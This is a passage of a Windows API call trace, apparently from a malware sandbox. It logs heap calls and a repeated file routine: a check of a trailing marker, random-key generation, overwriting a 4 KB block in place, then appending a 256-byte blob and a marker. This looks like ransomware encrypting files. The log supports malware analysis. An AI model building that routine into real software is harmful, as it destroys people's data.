0x7d47cb8 [0075.982] GetProcessHeap () returned 0x280000 [0075.982] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.982] GetProcessHeap () returned 0x280000 [0075.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.983] GetProcessHeap () returned 0x280000 [0075.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.983] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975a0 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.984] GetProcessHeap () returned 0x280000 [0075.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975a0 | out: hHeap=0x280000) returned 1 [0075.984] GetProcessHeap () returned 0x280000 [0075.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.985] GetProcessHeap () returned 0x280000 [0075.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.986] GetProcessHeap () returned 0x280000 [0075.986] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.987] GetProcessHeap () returned 0x280000 [0075.987] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.987] GetProcessHeap () returned 0x280000 [0075.987] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.987] GetProcessHeap () returned 0x280000 [0075.987] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.988] GetProcessHeap () returned 0x280000 [0075.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.988] GetProcessHeap () returned 0x280000 [0075.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.989] GetProcessHeap () returned 0x280000 [0075.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.989] GetProcessHeap () returned 0x280000 [0075.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.989] SetFilePointerEx (in: hFile=0x7d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.989] WriteFile (in: hFile=0x7d8, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.989] WriteFile (in: hFile=0x7d8, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.989] GetProcessHeap () returned 0x280000 [0075.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0075.989] GetProcessHeap () returned 0x280000 [0075.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.989] GetProcessHeap () returned 0x280000 [0075.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.989] CloseHandle (hObject=0x7d8) returned 1 [0075.990] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 22 [0075.990] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.991] ReadFile (in: hFile=0x7dc, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.991] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.991] GetProcessHeap () returned 0x280000 [0075.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.991] GetProcessHeap () returned 0x280000 [0075.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.991] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.991] GetProcessHeap () returned 0x280000 [0075.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0075.991] ReadFile (in: hFile=0x7dc, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.047] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.047] WriteFile (in: hFile=0x7dc, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.047] GetProcessHeap () returned 0x280000 [0076.047] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.048] GetProcessHeap () returned 0x280000 [0076.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.049] GetProcessHeap () returned 0x280000 [0076.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.050] GetProcessHeap () returned 0x280000 [0076.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.050] GetProcessHeap () returned 0x280000 [0076.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.050] GetProcessHeap () returned 0x280000 [0076.050] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.050] GetProcessHeap () returned 0x280000 [0076.050] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.056] GetProcessHeap () returned 0x280000 [0076.056] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.056] GetProcessHeap () returned 0x280000 [0076.056] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.056] GetProcessHeap () returned 0x280000 [0076.056] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.057] GetProcessHeap () returned 0x280000 [0076.057] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.058] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.058] WriteFile (in: hFile=0x7dc, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.058] WriteFile (in: hFile=0x7dc, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, 